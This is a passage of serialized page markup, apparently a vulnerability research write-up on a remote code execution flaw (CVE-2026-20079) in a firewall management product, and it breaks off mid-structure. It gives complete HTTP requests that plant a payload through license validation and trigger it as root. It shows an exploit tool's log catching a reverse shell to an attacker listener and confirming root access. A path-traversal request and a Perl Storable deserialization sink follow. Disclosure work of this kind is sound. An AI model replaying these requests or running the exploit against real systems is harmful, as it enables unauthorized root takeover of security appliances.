219\n",[1471,6007,6008],{"class":1473,"line":1546},[1471,6009,3383],{"emptyLinePlaceholder":54},[1471,6011,6012,6015,6018,6022,6024,6026,6028,6032,6034,6036,6039,6042,6044,6046,6049,6051,6053,6055,6057,6059,6062,6064,6066,6068,6071,6073,6075,6077,6079,6082,6084,6086,6088,6090,6092,6095,6097,6099,6101],{"class":1473,"line":1580},[1471,6013,6014],{"class":1491},"{",[1471,6016,1767],{"class":6017},"saDeg",[1471,6019,6021],{"class":6020},"sEff5","data",[1471,6023,1767],{"class":6017},[1471,6025,5167],{"class":1491},[1471,6027,1767],{"class":6017},[1471,6029,6031],{"class":6030},"s_MOj","lic",[1471,6033,1767],{"class":6017},[1471,6035,1447],{"class":1491},[1471,6037,1767],{"class":6038},"sh1VR",[1471,6040,5611],{"class":6041},"sINAO",[1471,6043,5808],{"class":2257},[1471,6045,5620],{"class":6041},[1471,6047,6048],{"class":2257},"\\n\\n",[1471,6050,5954],{"class":6041},[1471,6052,5808],{"class":2257},[1471,6054,1767],{"class":6038},[1471,6056,2298],{"class":1491},[1471,6058,1767],{"class":6017},[1471,6060,6061],{"class":6030},"statusmsg",[1471,6063,1767],{"class":6017},[1471,6065,1447],{"class":1491},[1471,6067,1767],{"class":6038},[1471,6069,6070],{"class":6041},"License is Invalid.",[1471,6072,5808],{"class":2257},[1471,6074,1767],{"class":6038},[1471,6076,2298],{"class":1491},[1471,6078,1767],{"class":6017},[1471,6080,6081],{"class":6030},"status",[1471,6083,1767],{"class":6017},[1471,6085,1447],{"class":1491},[1471,6087,2502],{"class":2328},[1471,6089,2298],{"class":1491},[1471,6091,1767],{"class":6017},[1471,6093,6094],{"class":6030},"isBaseLicense",[1471,6096,1767],{"class":6017},[1471,6098,1447],{"class":1491},[1471,6100,2502],{"class":2328},[1471,6102,6103],{"class":1491},"}}\n",[184,6105,6106,6107,6109,6110,6112],{},"But on the disk, the file will be deserialized from JSON and written to ",[1277,6108,1322],{}," with the fully formed shell script. Finally, the ",[1277,6111,1329],{}," interface is called. This also takes a set of special arguments:",[227,6114,6115,6126,6135],{},[230,6116,6117,6119,6120,6122,6123,6125],{},[1277,6118,5423],{},": the function being called by the server. In our case, this is ",[1277,6121,1333],{},", but in the exploit’s case can be any function that has an ",[1277,6124,3778],{}," permission mark.",[230,6127,6128,6130,6131,6134],{},[1277,6129,3983],{},": a JSON array that contains all the parameters for the function call in the order that they are called by the function. In this case, we are sending ",[1277,6132,6133],{},"[\"\u002Fvar\u002Ftmp\u002Flicense.tmp\",[\"42fb13fa-82e0-47a1-b147-3d64c8b9c708\"]]"," which contains the location of install files and a random UUID that is required to select the \"local install\" option of the readiness call (theoretically, if the system has a remote install setup and the sensors’ UUIDs are known, this should also allow execution on remote sensors).",[230,6136,6137,6139],{},[1277,6138,1306],{},": contains the retrieved CSRF token",[184,6141,6142],{},"Calling this will finally trigger the remote code execution as root:",[1449,6144,6146],{"className":3138,"code":6145,"language":3140,"meta":148,"style":148},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 224\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: *\u002F*\n\nfunction=SF::UI::DataObjectLibrary::upgradeReadinessCall¶meters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[1277,6147,6148,6160,6168,6176,6185,6193,6201,6209,6217,6221],{"__ignoreMap":148},[1471,6149,6150,6152,6154,6156,6158],{"class":1473,"line":1474},[1471,6151,3809],{"class":1483},[1471,6153,4000],{"class":1487},[1471,6155,3153],{"class":2247},[1471,6157,55],{"class":1487},[1471,6159,3158],{"class":2328},[1471,6161,6162,6164,6166],{"class":1473,"line":149},[1471,6163,3164],{"class":3163},[1471,6165,1447],{"class":2247},[1471,6167,3169],{"class":1527},[1471,6169,6170,6172,6174],{"class":1473,"line":1498},[1471,6171,3428],{"class":3163},[1471,6173,1447],{"class":2247},[1471,6175,3433],{"class":1527},[1471,6177,6178,6180,6182],{"class":1473,"line":1536},[1471,6179,3274],{"class":3163},[1471,6181,1447],{"class":2247},[1471,6183,6184],{"class":1527}," 224\n",[1471,6186,6187,6189,6191],{"class":1473,"line":1546},[1471,6188,3849],{"class":3163},[1471,6190,1447],{"class":2247},[1471,6192,3854],{"class":1527},[1471,6194,6195,6197,6199],{"class":1473,"line":1580},[1471,6196,3254],{"class":3163},[1471,6198,1447],{"class":2247},[1471,6200,4048],{"class":1527},[1471,6202,6203,6205,6207],{"class":1473,"line":1612},[1471,6204,3174],{"class":3163},[1471,6206,1447],{"class":2247},[1471,6208,3179],{"class":1527},[1471,6210,6211,6213,6215],{"class":1473,"line":1624},[1471,6212,3876],{"class":3163},[1471,6214,1447],{"class":2247},[1471,6216,3881],{"class":1527},[1471,6218,6219],{"class":1473,"line":1648},[1471,6220,3383],{"emptyLinePlaceholder":54},[1471,6222,6223],{"class":1473,"line":1654},[1471,6224,6225],{"class":1487},"function=SF::UI::DataObjectLibrary::upgradeReadinessCall¶meters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[1449,6227,6231],{"className":6228,"code":6229,"language":6230,"meta":148,"style":148},"language-shellsession shiki shiki-themes material-theme-lighter github-light github-dark monokai","poptart@grimm $ .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \ntime=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\ntime=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\ntime=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\ntime=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\ntime=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\ntime=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\ntime=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\ntime=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\nsh: cannot set terminal process group (14096): Inappropriate ioctl for device\nsh: no job control in this shell\nsh-5.1# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\nsh-5.1# exit\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell server\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n","shellsession",[1277,6232,6233,6244,6250,6255,6260,6265,6270,6275,6280,6285,6290,6295,6300,6305,6310,6321,6326,6331,6340,6345,6350],{"__ignoreMap":148},[1471,6234,6235,6239,6241],{"class":1473,"line":1474},[1471,6236,6238],{"class":6237},"sQqfL","poptart@grimm",[1471,6240,1505],{"class":1491},[1471,6242,6243],{"class":1487}," .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \n",[1471,6245,6246],{"class":1473,"line":149},[1471,6247,6249],{"class":6248},"s91G_","time=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\n",[1471,6251,6252],{"class":1473,"line":1498},[1471,6253,6254],{"class":6248},"time=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\n",[1471,6256,6257],{"class":1473,"line":1536},[1471,6258,6259],{"class":6248},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\n",[1471,6261,6262],{"class":1473,"line":1546},[1471,6263,6264],{"class":6248},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\n",[1471,6266,6267],{"class":1473,"line":1580},[1471,6268,6269],{"class":6248},"time=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\n",[1471,6271,6272],{"class":1473,"line":1612},[1471,6273,6274],{"class":6248},"time=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\n",[1471,6276,6277],{"class":1473,"line":1624},[1471,6278,6279],{"class":6248},"time=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\n",[1471,6281,6282],{"class":1473,"line":1648},[1471,6283,6284],{"class":6248},"time=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\n",[1471,6286,6287],{"class":1473,"line":1654},[1471,6288,6289],{"class":6248},"time=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\n",[1471,6291,6292],{"class":1473,"line":1662},[1471,6293,6294],{"class":6248},"time=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\n",[1471,6296,6297],{"class":1473,"line":1673},[1471,6298,6299],{"class":6248},"time=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\n",[1471,6301,6302],{"class":1473,"line":1681},[1471,6303,6304],{"class":6248},"sh: cannot set terminal process group (14096): Inappropriate ioctl for device\n",[1471,6306,6307],{"class":1473,"line":1691},[1471,6308,6309],{"class":6248},"sh: no job control in this shell\n",[1471,6311,6312,6315,6318],{"class":1473,"line":1699},[1471,6313,6314],{"class":6237},"sh-5.1",[1471,6316,6317],{"class":1491},"#",[1471,6319,6320],{"class":1487}," id\n",[1471,6322,6323],{"class":1473,"line":1705},[1471,6324,6325],{"class":6248},"id\n",[1471,6327,6328],{"class":1473,"line":1733},[1471,6329,6330],{"class":6248},"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\n",[1471,6332,6333,6335,6337],{"class":1473,"line":1773},[1471,6334,6314],{"class":6237},[1471,6336,6317],{"class":1491},[1471,6338,6339],{"class":1487}," exit\n",[1471,6341,6342],{"class":1473,"line":1789},[1471,6343,6344],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell server\"\n",[1471,6346,6347],{"class":1473,"line":1805},[1471,6348,6349],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\n",[1471,6351,6352],{"class":1473,"line":50},[1471,6353,6354],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n",[246,6356,6358],{"id":6357},"a-note-on-perl-storables","A Note on Perl Storables",[184,6360,6361,6362,6367,6368,6371,6372,6374,6375,1447],{},"The FMC system utilizes the Perl ",[274,6363,6366],{"href":6364,"rel":6365},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable",[278],"Storable"," module all over the place and even does C foreign-function calls to load Perl objects in multiple places. During our testing, we identified that the ",[1277,6369,6370],{},"sajaxint.cgi"," endpoint allowed a ",[1277,6373,3798],{}," call that end up trickling into the following suspicious few lines in ",[1277,6376,6377],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm",[1449,6379,6381],{"className":1465,"code":6380,"language":1467,"meta":148,"style":148},"sub DeSerialize\n{\n my $options = shift();\n\n if (!defined($options->{data}) && !defined($options->{filename}) && !defined($options->{fd}))\n {\n return undef;\n }\n\n my $deserialized_data;\ntry\n{\n local $Storable::Eval = $Storable::Eval = 1;\n\n if (defined($options->{fd}))\n {\n $deserialized_data = Storable::fd_retrieve($options->{fd});\n }\n elsif (defined($options->{filename}))\n {\n my $fn = SF::Reloc::RelocateFilename($options->{filename});\n\n if(-e $fn)\n {\n if ($options->{lock})\n {\n $deserialized_data = Storable::lock_retrieve($fn);\n }\n else\n {\n $deserialized_data = Storable::retrieve($fn);\n }\n }\n else\n {\n warn \"Unable to locate file for retrieval: $options->{filename}\";\n return undef;\n }\n }\n elsif ($options->{data})\n {\n $deserialized_data = Storable::thaw($options->{data});\n }\n}\n",[1277,6382,6383,6390,6394,6410,6414,6474,6479,6487,6491,6495,6504,6509,6513,6528,6532,6554,6558,6578,6582,6605,6609,6630,6634,6649,6654,6675,6680,6693,6698,6703,6707,6718,6722,6727,6732,6736,6757,6766,6771,6776,6795,6800,6820,6825],{"__ignoreMap":148},[1471,6384,6385,6387],{"class":1473,"line":1474},[1471,6386,4158],{"class":4157},[1471,6388,6389],{"class":4161}," DeSerialize\n",[1471,6391,6392],{"class":1473,"line":149},[1471,6393,5769],{"class":1487},[1471,6395,6396,6398,6400,6403,6406,6408],{"class":1473,"line":1498},[1471,6397,1502],{"class":1501},[1471,6399,1505],{"class":1491},[1471,6401,6402],{"class":1487},"options = ",[1471,6404,6405],{"class":1554},"shift",[1471,6407,4378],{"class":1491},[1471,6409,1770],{"class":1487},[1471,6411,6412],{"class":1473,"line":1536},[1471,6413,3383],{"emptyLinePlaceholder":54},[1471,6415,6416,6418,6421,6423,6425,6427,6430,6432,6434,6436,6439,6441,6443,6445,6447,6449,6451,6454,6456,6458,6460,6462,6464,6466,6468,6471],{"class":1473,"line":1546},[1471,6417,1549],{"class":1483},[1471,6419,6420],{"class":1487}," (!",[1471,6422,4214],{"class":1554},[1471,6424,1558],{"class":1487},[1471,6426,1492],{"class":1491},[1471,6428,6429],{"class":1487},"options",[1471,6431,1517],{"class":1516},[1471,6433,6014],{"class":1487},[1471,6435,6021],{"class":2257},[1471,6437,6438],{"class":1487},"}) && !",[1471,6440,4214],{"class":1554},[1471,6442,1558],{"class":1487},[1471,6444,1492],{"class":1491},[1471,6446,6429],{"class":1487},[1471,6448,1517],{"class":1516},[1471,6450,6014],{"class":1487},[1471,6452,6453],{"class":2257},"filename",[1471,6455,6438],{"class":1487},[1471,6457,4214],{"class":1554},[1471,6459,1558],{"class":1487},[1471,6461,1492],{"class":1491},[1471,6463,6429],{"class":1487},[1471,6465,1517],{"class":1516},[1471,6467,6014],{"class":1487},[1471,6469,6470],{"class":2257},"fd",[1471,6472,6473],{"class":1487},"}))\n",[1471,6475,6476],{"class":1473,"line":1580},[1471,6477,6478],{"class":1487}," {\n",[1471,6480,6481,6483,6485],{"class":1473,"line":1612},[1471,6482,1776],{"class":1483},[1471,6484,4344],{"class":1554},[1471,6486,1770],{"class":1487},[1471,6488,6489],{"class":1473,"line":1624},[1471,6490,1651],{"class":1487},[1471,6492,6493],{"class":1473,"line":1648},[1471,6494,3383],{"emptyLinePlaceholder":54},[1471,6496,6497,6499,6501],{"class":1473,"line":1654},[1471,6498,1502],{"class":1501},[1471,6500,1505],{"class":1491},[1471,6502,6503],{"class":1487},"deserialized_data;\n",[1471,6505,6506],{"class":1473,"line":1662},[1471,6507,6508],{"class":1487},"try\n",[1471,6510,6511],{"class":1473,"line":1673},[1471,6512,5769],{"class":1487},[1471,6514,6515,6518,6520,6523,6525],{"class":1473,"line":1681},[1471,6516,6517],{"class":1501}," local",[1471,6519,1505],{"class":1491},[1471,6521,6522],{"class":1487},"Storable::Eval = ",[1471,6524,1492],{"class":1491},[1471,6526,6527],{"class":1487},"Storable::Eval = 1;\n",[1471,6529,6530],{"class":1473,"line":1691},[1471,6531,3383],{"emptyLinePlaceholder":54},[1471,6533,6534,6536,6538,6540,6542,6544,6546,6548,6550,6552],{"class":1473,"line":1699},[1471,6535,1549],{"class":1483},[1471,6537,1488],{"class":1487},[1471,6539,4214],{"class":1554},[1471,6541,1558],{"class":1487},[1471,6543,1492],{"class":1491},[1471,6545,6429],{"class":1487},[1471,6547,1517],{"class":1516},[1471,6549,6014],{"class":1487},[1471,6551,6470],{"class":2257},[1471,6553,6473],{"class":1487},[1471,6555,6556],{"class":1473,"line":1705},[1471,6557,6478],{"class":1487},[1471,6559,6560,6562,6565,6567,6569,6571,6573,6575],{"class":1473,"line":1733},[1471,6561,1583],{"class":1491},[1471,6563,6564],{"class":1487},"deserialized_data = Storable::fd_retrieve(",[1471,6566,1492],{"class":1491},[1471,6568,6429],{"class":1487},[1471,6570,1517],{"class":1516},[1471,6572,6014],{"class":1487},[1471,6574,6470],{"class":2257},[1471,6576,6577],{"class":1487},"});\n",[1471,6579,6580],{"class":1473,"line":1773},[1471,6581,1651],{"class":1487},[1471,6583,6584,6587,6589,6591,6593,6595,6597,6599,6601,6603],{"class":1473,"line":1789},[1471,6585,6586],{"class":1483}," elsif",[1471,6588,1488],{"class":1487},[1471,6590,4214],{"class":1554},[1471,6592,1558],{"class":1487},[1471,6594,1492],{"class":1491},[1471,6596,6429],{"class":1487},[1471,6598,1517],{"class":1516},[1471,6600,6014],{"class":1487},[1471,6602,6453],{"class":2257},[1471,6604,6473],{"class":1487},[1471,6606,6607],{"class":1473,"line":1805},[1471,6608,6478],{"class":1487},[1471,6610,6611,6613,6615,6618,6620,6622,6624,6626,6628],{"class":1473,"line":50},[1471,6612,1708],{"class":1501},[1471,6614,1505],{"class":1491},[1471,6616,6617],{"class":1487},"fn = SF::Reloc::RelocateFilename(",[1471,6619,1492],{"class":1491},[1471,6621,6429],{"class":1487},[1471,6623,1517],{"class":1516},[1471,6625,6014],{"class":1487},[1471,6627,6453],{"class":2257},[1471,6629,6577],{"class":1487},[1471,6631,6632],{"class":1473,"line":3639},[1471,6633,3383],{"emptyLinePlaceholder":54},[1471,6635,6636,6639,6641,6644,6646],{"class":1473,"line":3644},[1471,6637,6638],{"class":1483}," if",[1471,6640,1558],{"class":1487},[1471,6642,6643],{"class":1516},"-e",[1471,6645,1505],{"class":1491},[1471,6647,6648],{"class":1487},"fn)\n",[1471,6650,6651],{"class":1473,"line":45},[1471,6652,6653],{"class":1487}," {\n",[1471,6655,6656,6659,6661,6663,6665,6667,6669,6672],{"class":1473,"line":4393},[1471,6657,6658],{"class":1483}," if",[1471,6660,1488],{"class":1487},[1471,6662,1492],{"class":1491},[1471,6664,6429],{"class":1487},[1471,6666,1517],{"class":1516},[1471,6668,6014],{"class":1487},[1471,6670,6671],{"class":2257},"lock",[1471,6673,6674],{"class":1487},"})\n",[1471,6676,6677],{"class":1473,"line":4409},[1471,6678,6679],{"class":1487}," {\n",[1471,6681,6682,6685,6688,6690],{"class":1473,"line":4434},[1471,6683,6684],{"class":1491}," $",[1471,6686,6687],{"class":1487},"deserialized_data = Storable::lock_retrieve(",[1471,6689,1492],{"class":1491},[1471,6691,6692],{"class":1487},"fn);\n",[1471,6694,6695],{"class":1473,"line":4461},[1471,6696,6697],{"class":1487}," }\n",[1471,6699,6700],{"class":1473,"line":4478},[1471,6701,6702],{"class":1483}," else\n",[1471,6704,6705],{"class":1473,"line":4498},[1471,6706,6679],{"class":1487},[1471,6708,6709,6711,6714,6716],{"class":1473,"line":4503},[1471,6710,6684],{"class":1491},[1471,6712,6713],{"class":1487},"deserialized_data = Storable::retrieve(",[1471,6715,1492],{"class":1491},[1471,6717,6692],{"class":1487},[1471,6719,6720],{"class":1473,"line":4511},[1471,6721,6697],{"class":1487},[1471,6723,6724],{"class":1473,"line":4535},[1471,6725,6726],{"class":1487}," }\n",[1471,6728,6729],{"class":1473,"line":4551},[1471,6730,6731],{"class":1483}," else\n",[1471,6733,6734],{"class":1473,"line":4572},[1471,6735,6653],{"class":1487},[1471,6737,6738,6741,6743,6746,6748,6750,6753,6755],{"class":1473,"line":4577},[1471,6739,6740],{"class":1554}," warn",[1471,6742,1739],{"class":1523},[1471,6744,6745],{"class":1527},"Unable to locate file for retrieval: ",[1471,6747,1492],{"class":1491},[1471,6749,6429],{"class":1487},[1471,6751,6752],{"class":1527},"->{filename}",[1471,6754,1767],{"class":1523},[1471,6756,1770],{"class":1487},[1471,6758,6759,6762,6764],{"class":1473,"line":4585},[1471,6760,6761],{"class":1483}," return",[1471,6763,4344],{"class":1554},[1471,6765,1770],{"class":1487},[1471,6767,6769],{"class":1473,"line":6768},38,[1471,6770,6726],{"class":1487},[1471,6772,6774],{"class":1473,"line":6773},39,[1471,6775,1651],{"class":1487},[1471,6777,6779,6781,6783,6785,6787,6789,6791,6793],{"class":1473,"line":6778},40,[1471,6780,6586],{"class":1483},[1471,6782,1488],{"class":1487},[1471,6784,1492],{"class":1491},[1471,6786,6429],{"class":1487},[1471,6788,1517],{"class":1516},[1471,6790,6014],{"class":1487},[1471,6792,6021],{"class":2257},[1471,6794,6674],{"class":1487},[1471,6796,6798],{"class":1473,"line":6797},41,[1471,6799,6478],{"class":1487},[1471,6801,6803,6805,6808,6810,6812,6814,6816,6818],{"class":1473,"line":6802},42,[1471,6804,1583],{"class":1491},[1471,6806,6807],{"class":1487},"deserialized_data = Storable::thaw(",[1471,6809,1492],{"class":1491},[1471,6811,6429],{"class":1487},[1471,6813,1517],{"class":1516},[1471,6815,6014],{"class":1487},[1471,6817,6021],{"class":2257},[1471,6819,6577],{"class":1487},[1471,6821,6823],{"class":1473,"line":6822},43,[1471,6824,1651],{"class":1487},[1471,6826,6828],{"class":1473,"line":6827},44,[1471,6829,1812],{"class":1487},[184,6831,6832,6833,6836,6837,6839,6840,6842],{},"By combining the ",[1277,6834,6835],{},"licenseValidate"," call with the ",[1277,6838,3798],{}," call, we can write arbitrary binary data to ",[1277,6841,1322],{},", including Storable serialized Perl. Additionally, the license validation logic appears more than happy to accept arbitrary path traversals:",[1449,6844,6846],{"className":3138,"code":6845,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 65\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nReferer: https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\nConnection: keep-alive\n\n[\"d8bcba74049486588e0e2f11dacfee4f\",\n\"batchResults\",\n\"..\u002Flicense.tmp\",\n\"1\"]\n",[1277,6847,6848,6861,6869,6877,6886,6894,6902,6910,6919,6927,6931,6944,6954,6964],{"__ignoreMap":148},[1471,6849,6850,6852,6855,6857,6859],{"class":1473,"line":1474},[1471,6851,3809],{"class":1483},[1471,6853,6854],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 ",[1471,6856,3153],{"class":2247},[1471,6858,55],{"class":1487},[1471,6860,3158],{"class":2328},[1471,6862,6863,6865,6867],{"class":1473,"line":149},[1471,6864,3164],{"class":3163},[1471,6866,1447],{"class":2247},[1471,6868,3169],{"class":1527},[1471,6870,6871,6873,6875],{"class":1473,"line":1498},[1471,6872,3428],{"class":3163},[1471,6874,1447],{"class":2247},[1471,6876,3433],{"class":1527},[1471,6878,6879,6881,6883],{"class":1473,"line":1536},[1471,6880,3274],{"class":3163},[1471,6882,1447],{"class":2247},[1471,6884,6885],{"class":1527}," 65\n",[1471,6887,6888,6890,6892],{"class":1473,"line":1546},[1471,6889,3849],{"class":3163},[1471,6891,1447],{"class":2247},[1471,6893,3854],{"class":1527},[1471,6895,6896,6898,6900],{"class":1473,"line":1580},[1471,6897,3254],{"class":3163},[1471,6899,1447],{"class":2247},[1471,6901,3863],{"class":1527},[1471,6903,6904,6906,6908],{"class":1473,"line":1612},[1471,6905,3174],{"class":3163},[1471,6907,1447],{"class":2247},[1471,6909,3179],{"class":1527},[1471,6911,6912,6914,6916],{"class":1473,"line":1624},[1471,6913,5889],{"class":3163},[1471,6915,1447],{"class":2247},[1471,6917,6918],{"class":1527}," https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\n",[1471,6920,6921,6923,6925],{"class":1473,"line":1648},[1471,6922,3194],{"class":3163},[1471,6924,1447],{"class":2247},[1471,6926,3199],{"class":1527},[1471,6928,6929],{"class":1473,"line":1654},[1471,6930,3383],{"emptyLinePlaceholder":54},[1471,6932,6933,6935,6937,6940,6942],{"class":1473,"line":1662},[1471,6934,3898],{"class":1491},[1471,6936,1767],{"class":1523},[1471,6938,6939],{"class":1527},"d8bcba74049486588e0e2f11dacfee4f",[1471,6941,1767],{"class":1523},[1471,6943,5927],{"class":1491},[1471,6945,6946,6948,6950,6952],{"class":1473,"line":1673},[1471,6947,1767],{"class":1523},[1471,6949,3798],{"class":1527},[1471,6951,1767],{"class":1523},[1471,6953,5927],{"class":1491},[1471,6955,6956,6958,6960,6962],{"class":1473,"line":1681},[1471,6957,1767],{"class":1523},[1471,6959,5518],{"class":1527},[1471,6961,1767],{"class":1523},[1471,6963,5927],{"class":1491},[1471,6965,6966,6968,6970,6972],{"class":1473,"line":1691},[1471,6967,1767],{"class":1523},[1471,6969,454],{"class":1527},[1471,6971,1767],{"class":1523},[1471,6973,3966],{"class":1491},[184,6975,6976],{},"Without valid Storable data, the application will respond as follows indicating that the sink above has been reached:",[1449,6978,6980],{"className":3138,"code":6979,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 404 Not Found\nDate: Fri, 06 Mar 2026 15:35:42 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: application\u002Fjson\nContent-Length: 192\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\n{\"error\":{\"text\":\"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.\\n\"}}\n",[1277,6981,6982,6996,7005,7013,7021,7029,7038,7046,7054,7062,7070,7078,7086,7094,7102,7110,7118,7122],{"__ignoreMap":148},[1471,6983,6984,6986,6988,6990,6993],{"class":1473,"line":1474},[1471,6985,3153],{"class":2247},[1471,6987,55],{"class":1487},[1471,6989,3213],{"class":2328},[1471,6991,6992],{"class":2328}," 404",[1471,6994,6995],{"class":1527}," Not Found\n",[1471,6997,6998,7000,7002],{"class":1473,"line":149},[1471,6999,3224],{"class":3163},[1471,7001,1447],{"class":2247},[1471,7003,7004],{"class":1527}," Fri, 06 Mar 2026 15:35:42 GMT\n",[1471,7006,7007,7009,7011],{"class":1473,"line":1498},[1471,7008,3234],{"class":3163},[1471,7010,1447],{"class":2247},[1471,7012,3239],{"class":1527},[1471,7014,7015,7017,7019],{"class":1473,"line":1536},[1471,7016,3244],{"class":3163},[1471,7018,1447],{"class":2247},[1471,7020,3249],{"class":1527},[1471,7022,7023,7025,7027],{"class":1473,"line":1546},[1471,7024,3254],{"class":3163},[1471,7026,1447],{"class":2247},[1471,7028,3863],{"class":1527},[1471,7030,7031,7033,7035],{"class":1473,"line":1580},[1471,7032,3274],{"class":3163},[1471,7034,1447],{"class":2247},[1471,7036,7037],{"class":1527}," 192\n",[1471,7039,7040,7042,7044],{"class":1473,"line":1612},[1471,7041,3284],{"class":3163},[1471,7043,1447],{"class":2247},[1471,7045,3289],{"class":1527},[1471,7047,7048,7050,7052],{"class":1473,"line":1624},[1471,7049,3294],{"class":3163},[1471,7051,1447],{"class":2247},[1471,7053,3299],{"class":1527},[1471,7055,7056,7058,7060],{"class":1473,"line":1648},[1471,7057,3304],{"class":3163},[1471,7059,1447],{"class":2247},[1471,7061,3309],{"class":1527},[1471,7063,7064,7066,7068],{"class":1473,"line":1654},[1471,7065,3314],{"class":3163},[1471,7067,1447],{"class":2247},[1471,7069,3319],{"class":1527},[1471,7071,7072,7074,7076],{"class":1473,"line":1662},[1471,7073,3324],{"class":3163},[1471,7075,1447],{"class":2247},[1471,7077,3329],{"class":1527},[1471,7079,7080,7082,7084],{"class":1473,"line":1673},[1471,7081,3334],{"class":3163},[1471,7083,1447],{"class":2247},[1471,7085,3339],{"class":1527},[1471,7087,7088,7090,7092],{"class":1473,"line":1681},[1471,7089,3344],{"class":3163},[147